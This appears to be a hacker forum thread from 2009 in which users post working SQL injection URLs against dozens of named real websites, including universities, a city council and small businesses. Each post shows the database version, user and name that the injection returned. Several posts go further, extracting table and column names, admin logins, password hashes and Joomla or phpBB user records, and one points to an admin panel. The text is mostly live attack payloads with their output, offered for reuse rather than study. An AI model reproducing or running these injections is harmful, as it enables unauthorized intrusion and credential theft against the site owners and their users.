http://www.virtualnahercegovina.com/balkan-press/tekst.php?id=641+and+substring(version(),1,1)=3

http://www.sleepbootraaf.nl/tekst.php?id=-35+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8/*
4.1.21-standard-log:raaf_db@localhost:raaf_db

http://www.i-ceny.ru/p/?action=rubr&razdel=14&rub=140+and+substring(version(),1,1)=5

http://www.ultra.art.pl/teksty/tekst.php?kid=11&id=-12+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6

5.0.27-log:fitom_wis_b284@host-81-2-200-96.alpha.pl:fitomedic_b284

[aywo]
16.06.2009, 12:41
http://nerjaveem.ru/index.php?page=-1+union+select+concat_ws(0x3A,%20database(),%20ver sion(),%20user())/*&foto=2


wwwnerjaveemru
4.1.22-log
nerjavee@localhost

AlexSatter
16.06.2009, 12:44
http://www.n-oil.by/lubrication/torg.php?id=6+and+substring(version(),1,1)=5

http://www.bg-kniga.ru/bgkniga.php?id=-5+union+select+concat_ws(0x3a,version(),user(),dat abase()),2
5.0.70-log:dbu_ansimov_1@localhost:bgkn

geforse
16.06.2009, 13:07
http://pic.ipicture.ru/uploads/090616/42451/i5VgYnfV4T.jpg

www.sevelina.com (http://sevelina.com) (http://pic.ipicture.ru/uploads/090616/42451/UM9Z59T6rb.jpg)

http://www.sevelina.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(user_login,0 x3a,user_pass,0x3a,user_email),6,7,8+from+s_users+ limit+0,1--

AlexSatter
16.06.2009, 13:12
http://www.kech.pl/literatura.php?id=-6+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9
5.0.66a-log:kech@localhost:kech

http://www.exkola.com.br/scripts/literatura.php?id=-457+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7
4.1.25-Debian_mt1-log:db19180@64.13.232.26:db19180_exkola_prod

http://www.gchk.cz/literatura.php?ID=-33+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
4.0.31-20070605_Debian-7-log:gchk@88.86.104.68:g

http://www.gawith.nazwa.pl/literatura.php?id=3+and+substring(version(),1,1)=5

Gorev
16.06.2009, 13:39
http://www.auscraftnet.com.au/directory/listing.php?cat_id=4&id=-718+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62


Database Version: 4.0.25-standard
Database name: auscraft_list
User name: auscraft_acn04@localhost
Os : pc-linux-gnu

AlexSatter
16.06.2009, 14:13
http://www.cyberpunkswebsite.com/PPP/pit.php?id=3195+and+substring(version(),1,1)=4

http://www.laborresearch.org/print.php?id=391+and+substring(version(),1,1)=3

http://www.media.tas.gov.au/print.php?id=21499+and+substring(version(),1,1)=3

http://www.compudrug.com/print.php?id=8+and+substring(version(),1,1)=3
I keep running into MySQL 3 today

http://russian.kiev.ua/print.php?id=11603795+and+substring(version(),1,1) =5

http://www.npaact.org.au/print.php?id=-87+union+select+1,2,unhex(hex(concat_ws(0x3a,versi on(),user(),database()))),4,5,6,7,8/*
4.1.11-Debian_4sarge7:npaact@localhost:npaact

http://www.promotecraft.com.au/print.php?id=-121+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*
5.0.45:deb2361@localhost:promotecraft_com_au_-_ep

Gorev
16.06.2009, 16:24
http://www.alexandriarealestate.com.au/properties.php?proDetails=3&property_ID=-292+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,concat_ws(0x3a,version(),database( ),user(),@@version_compile_os),38


Database Version: 4.1.22-standard-log
Database name: alexandriarealestate
User name: alexandria@localhost
OS : pc-linux-gnu

mailbrush
16.06.2009, 19:00
http://www.cardcontrol.com/web_DE/Produkte.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*
dbo170234670@localhost:db170234670:4.0.27-standard

en4cer
16.06.2009, 19:40
http://maps.cs-bg.info/download.php?id=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),6,7,8,9,10/*&db=maps16&action=download

Rednoise
16.06.2009, 21:10
nouiit.ru - Institute of Information Technologies


http://www.nouiit.ru/index.php?i=10&id=7'+UNION+SELECT+1,2,3,CONCAT(0x7873716C696E6A62 6567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2 F,User(),0x7873716C696E6A656E64),5,6,7,8,9,10,11+L IMIT+1,1/*


Database Version: 4.1.22-log
Database name: db_lira_2
User name: dbu_lira_1@192.168.5.21

tvoisex.ru


http://www.tvoisex.ru/read.php?i=16'+UNION+SELECT+CONCAT(0x7873716C696E6 A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A 2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8, 9,10,11,12,13+LIMIT+1,1/*




Database Version: 4.1.21
Database name: badvertd061_db2
User name: badvertd061@localhost




artgene.co.uk


http://www.artgene.co.uk/page.php?i=-140'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,u ser(),database(),version()),10/*



Database Version: 5.0.45
Database name: pbsportal
User name: pulse@server213-171-218-56.livedns.org.uk

AFoST
16.06.2009, 23:01
multihost.ru
http://www.multihost.ru/FAQ/hosting/0%27%20UNION%20SELECT%201,2,3,concat_ws(0x20,user( ),database(),version(),@@basedir,@@datadir,@@tmpdi r,@@version_compile_os),5%20--%20-%20/
multi_mx@localhost multi_mx 5.0.67-community-log / /var/lib/mysql/ /tmp/ redhat-linux-gnu

Rednoise
16.06.2009, 23:18
trushop.ru


http://www.trushop.ru/item.php?i=120'+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4,5,6,7,8,9,10,11,12,13/*



Database Version: 5.0.32-Debian_7etch8-log
Database name: z101905_trus
User name: z101905_trus@77.221.130.24

RulleR
16.06.2009, 23:47
mssql
[PR 6]
http://www.wehirealiens.com/employer/index.asp?id=7712+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.3068.00 (X64) Feb 26 2008 23:02:54 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
===================
[PR 3]
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+system_user)--
system_user:qdx018
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+top+1+table_name+from+informati on_schema.tables)--
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+top+1+table_name+from+informati on_schema.tables+where+table_name+not+in+(%27Pedid osTienda%27))--
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+top+1+table_name+from+informati on_schema.tables+where+table_name+not+in+(%27Pedid osTienda%27,%27Peliculas%27,%27GuiaTallas%27,%27Pe rsonajesAnimados%27,%27Plataformas%27,%27ItemPedid oTienda%27,%27LinksRelacionados%27,%27Webs%27,%27M ensajesPanelControlTiendas%27,%27MensajesSugerir%2 7,%27PreguntasRegistro%27,%27Noticias%27,%27Produc tos%27,%27ProductosActualidad%27,%27NoticiasBoleti n%27,%27ProductosActualidad1%27,%27VideosRedSocial %27,%27NoticiasMerchandising%27,%27ProductosColabo radores1%27,%27NumeroCapturasPorDiaErroresHttp%27, %27ComentariosBlog%27,%27NumeroVendidos%27,%27Nume roVendidosGenerado%27,%27AmpliacionesCorreccionesR edSocial%27,%27ProductosTiendas%27,%27Programas%27 ,%27Proveedores%27,%27OfertasTiendas%27,%27Reserva Ganadores%27,%27OpinionCliente%27,%27Series%27,%27 OpinionesProductos%27,%27StockMinimo%27,%27Opinion Pagina%27,%27Paises%27,%27Actores%27,%27PalabrasTa buOpinionProductos%27,%27Actrices%27,%27Tallas%27, %27PreciosAntiguosProductos%27,%27TambienComprado% 27,%27Tarifas%27,%27PreciosLienzos%27,%27AnalisisP roductos%27,%27TarifasCorreos%27,%27Anuncios%27,%2 7AmigosRedSocial%27,%27TarifasCorreosInternacional es%27,%27PreciosMarcos%27,%27AutoresComics%27,%27T arifasInternacionales%27,%27PreciosNuevosProductos %27,%27TipoLugaresBlog%27,%27PreciosNumeroFotos%27 ,%27AvisarUsuariosProductosNuevos%27,%27TipoProduc tos%27,%27Banners%27,%27TipoProductosWeb%27,%27Pre ferenciasPanelControl%27,%27BannersBoletin%27))--
===================
[PR 0]
http://www.planetpeace.ws/index.asp?id=11+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.planetpeace.ws/index.asp?id=11+or+1=(select+system_user)--
system_user:PPContent
http://www.planetpeace.ws/index.asp?id=11+or+1=(select+top+1+table_name+from +information_schema.tables)--

mailbrush
17.06.2009, 10:09
http://times.ua/search/results/?keyword=-1'+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version())/*madest@localhost:daytop:5.0.45-log
Didn't risk going further...

Adm1n4eG
17.06.2009, 11:12
www.tyumen.ru

http://www.tyumen.ru/?sectionid=129&catid=0&page=1&docid=799994+union+select+0,0,0,co ncat_ws(0x3a,user(),database(),version()),0,0,0 ,0,0,0--

tyumen@10.0.1.4:tyumen_site:5.0.51a-15-log

HAXTA4OK
17.06.2009, 11:12
http://www.kcc.edu.np/front/newsdetail.php?id=1'+union+select+1,concat_ws(0x3a ,version(),database(),user()),3,4,5,6,7%23

5.0.51b-community-nt:kcc:kccdbusr@66.63.181.102

http://www.kcc.edu.np/front/newsdetail.php?id=1'+union+select+1,group_concat(c olumn_name),3,4,5,6,7+from+information_schema.colu mns+where+table_name=0x75736572%23

id,user_name,passwd,address,email,full_name,contac t_no

$n@ke
17.06.2009, 13:32
http://ftp.uceng.uc.edu/resources/collegenews/fullstory.php3?id=129'SQL
branch 4 (((

AlexSatter
17.06.2009, 15:00
http://www.tonybishop.com/ps.php?id=1+and+substring(version(),1,1)=5

http://www.faitalpro.com/products/schede/ps.php?id=-101030100+union+select+1,2,concat_ws(0x3a,version( ),user(),database()),4,5,6,7
5.0.32-Debian_7etch6-log:faitalpro@localhost:faitalpro

HAXTA4OK
17.06.2009, 15:09
http://www.shine.edu.np/news_and_notice.php?id=-1'+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5+--+

5.0.77-community:shineed_db:shineed_db@localhost

tables: countries,notice,partner_institutions,admin

####################################

http://www.united.edu.np/academy/notice.php?id=-1+union+select+1,concat_Ws(0x3a,version(),user(),d atabase()),3,4--

5.0.77-community:unitede_uniteddb@localhost:unitede_unite dedudb

udman
17.06.2009, 18:45
http://www.metalosplav.ru/notices/?view=-561842+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,conc at_ws(0x0b,us er(),version(),database()),13,14

hameleon@localhost
5.0.67-percona-highperf-b7-log
hameleon_metal

HAXTA4OK
17.06.2009, 18:49
http://www.whr.org.np/event/event.php?id=-1+union+select+1,2,3,concat_Ws(0x3a,version(),data base(),user()),5,6,7--

4.1.22-standard:whrorg_whrsanwedorg:whrorg_user@localhost

Gorev
17.06.2009, 19:09
http://www.disabilityconsultants.org.au/findconsultant.php?command=showbigconsultant&itemtypeid=6&consultantsid=-6+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),da tabase(),useR(),@@version_compile_os),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29--

Database Version: 5.0.81-community
Database name: disabili_disabilityconsultants
User name: disabili_chris@localhost
Os : pc-linux-gnu

HAXTA4OK
17.06.2009, 19:30
http://www.np-icet.ru/index1.php?key=russeminars&id=-1+union+select+1,concat_Ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10--

5.0.51:db5709j:us5709j@localhost

tables: pages_topics,news,seminars_rus,pages_additional,se minars_world,pages_index,pages_subtopics,banners

Gorev
17.06.2009, 19:42
http://www.entacom.com.au/?p=catalog&c=21&s=-658+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9,10 ,11,12--&v=RZ-DESTRUCTOR



Database Version: 4.1.22-standard-log
Database name: scott_entacom
User name: scott_root@localhost
Os : unknown-linux-gnu

W@r.N0i$e
17.06.2009, 20:01
http://www.terminators.ru/index.php?mode=5&rw_key=-1+union+select+version(),user(),data base(),@@version_compile_os/*


Database Version: 4.1.22-log
Database name: wwwterminatorsru
User name: termin03@localhost
OS: portbld-freebsd6.2

Gorev
17.06.2009, 21:16
http://www.campingworld.com.au/site/products.php?prodid=-154+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat_ws(0x3a,version(),database(),useR(),@@ve rsion_compile_os),17,18,19,20/*&iscatid=13&issubid=32


Database Version: 4.1.22
Database name: cms_db
User name: cmsuser@localhost
Os : redhat-linux-gnu

Skofield
17.06.2009, 21:29
http://itp.nyu.edu PR 6
http://itp.nyu.edu/thesis/spring2007/stream.php?movieID=1+union+select+1,2,3,4,5,concat _ws(0x3a,version(),database(),user()),7,8,9,10,11, 12,13,14/*

Database Version - 5.0.45-log
Database name - video_comments
User name - vc_update@localhost

nicusor
18.06.2009, 00:27
http://mbantua[dot]com[dot]au
PR 5

http://mbantua[dot]com[dot]au/news.php?id=9999+union+select+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7,8,9--

user() = Mbantua_web@web3.fluidhosting.com
version() = 5.0.67-log
database() = Mbantua_website


admin password
http://mbantua[dot]com[dot]au/news.php?id=-55+union+select+1,concat_ws(0x3a,login,password),3 ,4,5,6,7,8,9+from+admin--

the admin panel itself
http://mbantua[dot]com[dot]au/admin

udman
18.06.2009, 11:57
http://www.ifr-pan.krakow.pl/main.php?lang=eng&page=akt&id=-58+UNION+SELECT+0,1,2,3,4,5,6,concat_ws(0x0b,u ser(),version(),database()),8,9+--+
kuba@localhost
5.0.68
ifr


http://www.freemarket.net.ua/index.php?reg=-15+UNION+SELECT+0,1,2,3,concat_Ws(0x0b,use r(),version(),database()),5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19+--+&page=8&cat=0&rub=0
dorosh_fuser@localhost
4.1.22-standard-log
dorosh_fm

AlexSatter
18.06.2009, 12:38
http://www.etechnology.ru/mk.php?id=-1001+union+select+1,concat_ws(0x3a,version(),user( ),database()),3
4.0.27-log:etechnology@zvm17.host.ru:etechnology

http://www.swiss-luxury-world.ch/watches/en/watchbrands/marke/mk.php?md=405&id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4
output in the title

http://www.cmes.arizona.edu/resources/mp.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31
4.0.12:cmes_web@localhost:cmes

http://www.rallyonline.pl/mp.php?1&&modex=pokaz&T[id]=-1163+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20
5.1.30-log:mysql@localhost:rallyonline_utf

http://2b-i.co.uk/2B-me.php?id=-13+union+select+concat_ws(0x3a,version(),user(),da tabase())
5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi

http://confident-image.co.uk/2B-me.php?id=-32+union+select+concat_ws(0x3a,version(),user(),da tabase())
5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi

http://www.klara-rulikova.cz/volby-do-senatu-pisi-o-me.php?ID=-1+union+selecT+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
5.0.51a-3ubuntu5.4-log:klararulik@uvirt2.active24.cz:klararulik

http://global-travel.mobi/hotels-my.php?id=4882+and+substring(version(),1,1)=5

http://www.latoi.com/my.php?user_id=2205&id=532+and+substring(version(),1,1)=4

http://www.tuk-tuk.com/member/my.php?id=198+and+substring(version(),1,1)=5

http://www.akademik-m.by/page.php?id=43+and+substring(version(),1,1)=5

udman
18.06.2009, 14:31
http://www.nibulon.com/r/news.php?id=-3401518+UNION+SELECT+0,1,2,concat_ws(0x0b,user (),versio n(),database()),4,5,6,7&page=1

nibulon_31@localhost
5.0.67-0ubuntu6
nibulon_31


http://www.komsomol.com.ua/ru/index.php?s_id=products&e_id=-8+UNION+SELECT+0,1,2,3,concat_ws(0x0b,user(),v ersion(),database()),5
komsomol_alex@localhost
5.0.77-community
komsomol_komsomol

$n@ke
18.06.2009, 18:22
http://www.paulsmiths.edu/athletics/news.php?news_id=13'+union+select+1,2,3,4+limit+1, 1/*
User: athletics@localhost
Version: 5.0.45
Dbname: athletics_main

Dj-Matrix
18.06.2009, 18:55
http://rio.edu/news/index.php?key=-1+UNION+SELECT+1,2,version(),4,5+FROM+information_ schema.tables
Version: 5.0.67

DezMond™
18.06.2009, 19:07
http://www.avto-tyre.ru/item_view.php?item_id=-1407+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+from+mysql.user+--+

http://www.elmash-holding.ru/elmcatalog/item/?item_id=473+union+select+1,2,3,4,database(),6,7+/*+
elektromash

http://www.elmh.ru/elmcatalog/item/?item_id=453+union+select+1,2,3,4,version(),6,7+/*+
4.0.27-log

Tic 1000
http://www.litsovet.ru/index.php/litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_logi n,admin_psw,admin_name,admin_mail),5,6,7,8,9,10,11 ,12,13,14,15+from+tbl_admin+--+
litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_id,a dmin_name,admin_login,admin_password,admin_status) ,5,6,7,8,9,10,11,12,13,14,15+from+admin+--+

Dj-Matrix
18.06.2009, 20:04
http://www.chelfishing.ru/links.php?t=search&search_keywords=asd&start=9999999+UNION+SELECT+1,version(),3,4,5,6,7,8 ,9,10,11,12,13/*
Powered by phpBB2
mysql version: 4.1.20

Adm1n4eG
18.06.2009, 20:05
http://www.zemat.com/ru/zgr zewarki.php?id=-99999+union+select+concat_ws(ch ar(58),DATABASE(),US ER(),VERSION())--

imakorru
imakorru@localhost
5.0.51-Dotdeb_0.dotdeb.0-log

Dobby007
18.06.2009, 22:02
Saw this site today in PHP injections. I thought... I'll take a look: maybe there's something else... Turned out there is :) May Adm1n4eG forgive me :)
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database(),@@version_compile_os)/*
VERSION(): 5.0.16
USER(): govor@217.117.80.162
BAZA(): govor
OS(): portbld-freebsd6.0
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(table_name)+from +information_schema.tables+where+table_schema%3C%3 E0x696E666F726D6174696F6E5F736368656D61/*
Tables:
GAccess,GBase,GBaseImg,GHotLink,GHotel,GHotelImg,G News,GNewsImg,GPlace,GPlaceB,GSeason,GTour,GTourIm g,GType,forum,new,news
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(column_name)+fro m+information_schema.columns+where+table_name=0x47 416363657373/*
Columns in table GAccess:
GAcId,GLog,GPass,GIP,GSet
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(GAcId,0x3a,GLog, 0x3a,GPass,0x3a,GIP,0x3a,GSet,0x3a)+from+GAccess/*
And here's the long-awaited admin... :)

Flair
18.06.2009, 22:30
http://www.aikidoural.ru/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a, %20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

http://tango.net.ua/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a, %20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

Flair
18.06.2009, 22:37
http://avtos.su/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 %20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*


http://www.milkoff.ru/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 %20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

M.W.N.N.
18.06.2009, 23:14
http://www.suncity-travel.com/index.php?id=34+union+select+1,2,3,4,concat_ws(0x3 a,version(),database(),user()),6,7,8,9,10,11+limit +1,1/*
version():4.0.23a-log
database():suncity
user():scorp@localhost
__
http://www.mathrubhumi.org/travel/news.php?id=8935+union+select+1,2,3,4,5,concat_ws( 0x3a,version(),database(),user()),7,8,9,10,11,12,1 3,14,15,16,17,18,19
version():5.0.45
database():entravel
user():dedop@localhost
__
http://www.azores.com/travel/tour.php?id=56+union+select+1,2,3,4,5,concat_ws(0x 3a,version(),database(),user()),7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7++limit+1,1/*
version():5.0.45
database():azoresco
user():azoresco@localhost
__
http://soloentreamigas.com.ve/articulo.php?ID=60+union+select+1,2,3,4,5,concat_w s(0x3a,version(),database(),user()),7,8,9,10,11,12 ,13,14,15,16,17,18,19+limit+1,1/*
version():5.0.37-community-log
database():chicas
user():chicas@192.168.1.254
__
http://www.cavim.com.ve/pub.php?id=40+union+select+1,2,3,4,concat_ws(0x3a, version(),database(),user()),6,7,8,9,10,11,12,13,1 4,15,16,17,18
version():5.0.51a-community-log
database():cavimc_cavim
user():cavimc_sa@localhost
__
http://epetitions.bristol.gov.uk/petition.php?id=166+union+select+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user()),8,9,10,11,1 2,13,14,15
version():5.0.60-log
database():bristol_epetitioner
user():epetitioner_user@localhost

br1tva
19.06.2009, 02:28
http://www.sbrshop.com/store/maincategory.php?maincat_id=-1+union+select+1,username,3,4,5,6,7,8,9,10+from+us ers--

AlexSatter
19.06.2009, 09:41
http://www.skylinechili.com/st.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6
5.0.45:skyline@localhost:skyline

http://www.car-stylingparts.com/Show-St.php?id=-6+union+select+1,2,3,concat_Ws(0x3a,version(),user (),database()),5
5.0.77-community-log:carstyl_newdbs@localhost:carstyl_newcardb

Dj-Matrix
19.06.2009, 09:59
http://www.norfolk.gov/News/Press/prdetails.asp?PressID=-1+UNION+SELECT+1,2,3,4,5,@@version,7,8,9,10,11--
Microsoft SQL Server 2005

AlexSatter
19.06.2009, 10:07
http://nl.sharp.be/php/td.php?par=1108_519_no_1718+and+substring(version( ),1,1)=5

Suzuki, it turns out, is also full of sql-inj :)
http://classic.suzuki.de/code/td.php?id=-2006101+union+select+1,2,concat_ws(0x3a,version(), user(),database()),4,5,6,7,8,9,10,11/*
5.0.32-Debian_7etch5-log:suzuki@localhost:suzuki

http://www.martin-rowe.com/a.php?id=-38+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6
4.1.22:martinrowe@localhost:martin

http://www.uaz-upi.com/news/art.php?id=145+and+substring(version(),1,1)=3

http://www.endocrin.ru/art.php?id=-430+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5
4.0.27-log:endocrin@zvm12.host.ru:endocrin

http://catalogue.nimk.nl/art.php?id=7231+and+substring(version(),1,1)=5

http://www.medoded.ru/art.php?id=-72+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9
5.0.32-Debian_7etch10-log:med@localhost:medoded

http://me.net.ua/art.php?id=402+and+substring(version(),1,1)=5

http://www.brownsfineart.com/gallery/art.php?ID=-77+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
4.1.22:browns@localhost:browns_db

http://www.geopribori.ru/art.php?id=a138+and+substring(version(),1,1)=4

http://express.fa13.com/art.php?id=-17622+union+selecT+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10
4.1.10a:fa13_forum@localhost:fa13_add

http://www.infoservis.net/region.php?idRegion=3+and+substring(version(),1,1) =5

Flair
19.06.2009, 12:09
http://www.propheticliving.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*

http://www.shoprivergate.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*

udman
19.06.2009, 14:00
http://www.nordhouse.ru/article.php?id=-3'+UNION+SELECT+concat_Ws(0x0b,user(),versio n(),database())+--+
nordhouseru@nordhouse.ru
4.0.26
nordhouseru

Rednoise
19.06.2009, 14:02
http://www.38rus.com/more.php?UID=-4127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,concat_ws(0x3a,version(),user(),database())/*

5.0.45:nia-irkutsk@localhost:38rus

http://www.astafiev.ru/topic.php?UID=-120+union+select+1,concat_ws(0x3a,version(),user() ,database())/*

5.0.45:astafiev@localhost:astafiev

beerhack
19.06.2009, 18:28
http://abrionline.org/expert.php?id=-99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,version(),18,19,20,21,22,23,24/*
Database Version: 4.0.27-max-log
Database name: ABRIDB
User name: ABRIDB@208.109.14.103

------------------------------------------------------------------------

http://www.nepaltourismdirectory.com/nepal_travel_information.php?id=-99999+union+select+1,2,version(),4,5,6,7,8--
Database Version: 5.0.77-community
Database name: ntdirectory_ntur12
User name: ntdirectory_dbnt@localhost

------------------------------------------------------------------------

http://www.sunbula.org/etemplate.php?id=-99999+union+select+1,2,3,4,version(),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19/*
Database Version: 4.0.17-standard
Database name: sunbulashop
User name: sunbulashop@localhost

------------------------------------------------------------------------

http://www.opusmaxim.com/news.php?id=-99999+union+select+1,concat_ws(0x3a,username,passw ord),3,4,5,6+from+tbl_user--
Database Version: 5.0.77-community
Database name: wei10194_opus
User name: wei10194_opus@huklonsov022b.hostinguk.net

Skofield
19.06.2009, 18:46
http://www.osumensvo.com/news/view_article.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*

Database Version: 5.0.45-community-log
Database name: 348781_vo
User name: 348781_web@172.16.10.85

http://www.osumensvo.com/news/view_article.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9+from+information_schema.tables/*

these are all the tables

------------------------------------------------------------------------------------------------------------------------

http://www.usajewelryfactory.com/states.php?id=-46+union+select+1,version(),3,4/*

Database Version: 4.1.22-standard-log
Database name: jewelryf_jewelry
User name: jewelryf_jewel@localhost

HAXTA4OK
19.06.2009, 21:23
http://www.arunima.edu.np/readdetail.php?type=highlights&id=-1+union+select+1,concat_Ws(0x3a,database(),user(), version()),3,4,5--

P.S. my birthday is today-tomorrow :D everyone's drinking :D

Gorev
19.06.2009, 21:25
http://scaa.asn.au/consultants_directory.php?id=-5+UNION+SELECT+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)--


Database Version: 5.0.51-log
Database name: lavarox_scaa
User name: lavarox_scaa@win20.qnetau.com
Os : PORTBLD-FREEBSD6.0

although everything suggests it's Windows there..

HAXTA4OK
19.06.2009, 21:33
http://www.whr.org.np/event/event.php?id=1+union+select+1,2,3,concat_Ws(0x3a,v ersion(),user(),database()),5,6,7--

4.1.22-standard:whrorg_user@localhost:whrorg_whrsanwedorg


http://www.nayagoreto.org.np/en/document.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--

5.0.67-community:nayagore_dbnewtrail:nayagore_goreto@loca lhost

PS 1 hour 20 minutes more and I'm 19)))):D everyone's partying

Pashkela
20.06.2009, 03:51
http://www.aimia.com.au/i-cms?page=37'+and+substring(version(),1,1)=4--+



http://www.sanrio.ru/page/page.php?pgid=-12+or+1=1+and+substring(version(),1,1)=5

DezMond™
20.06.2009, 12:25
http://www.salon-medibat.com/fr/actualite.php?idact=-51+union+select+1,2,3,concat_ws(0x3a3a,id,login,ps wd),5,6+from+medibat_users+/*+

http://www.poissonrougepictures.com/fr/news.php?id=-39+union+select+1,2,3,user_name,password+from+admi n+/*+

http://www.akata.fr/news.php?cat=-4+UnIoN+SeLecT+1,database(),3,4,5,6,7,8,9+--+
akatav2

http://www.obskure.com/fr/kro_model.php?n_kro=-2818+union+select+1,null,3,concat_ws(0x3a3a,userna me,user_password,user_passchg,user_email)+from+zen ew_phpbb_users+--+

udman
20.06.2009, 12:57
http://www.euspro.com
http://www.euspro.com/index.php?cat=-8+UNION+SELECT+0,1,2,concat_Ws(0x0b,user(),databas e(),versi on()),4,5,6+--+
aldakim_euspro@webua3.ukrhosting.com
aldakim_euspro
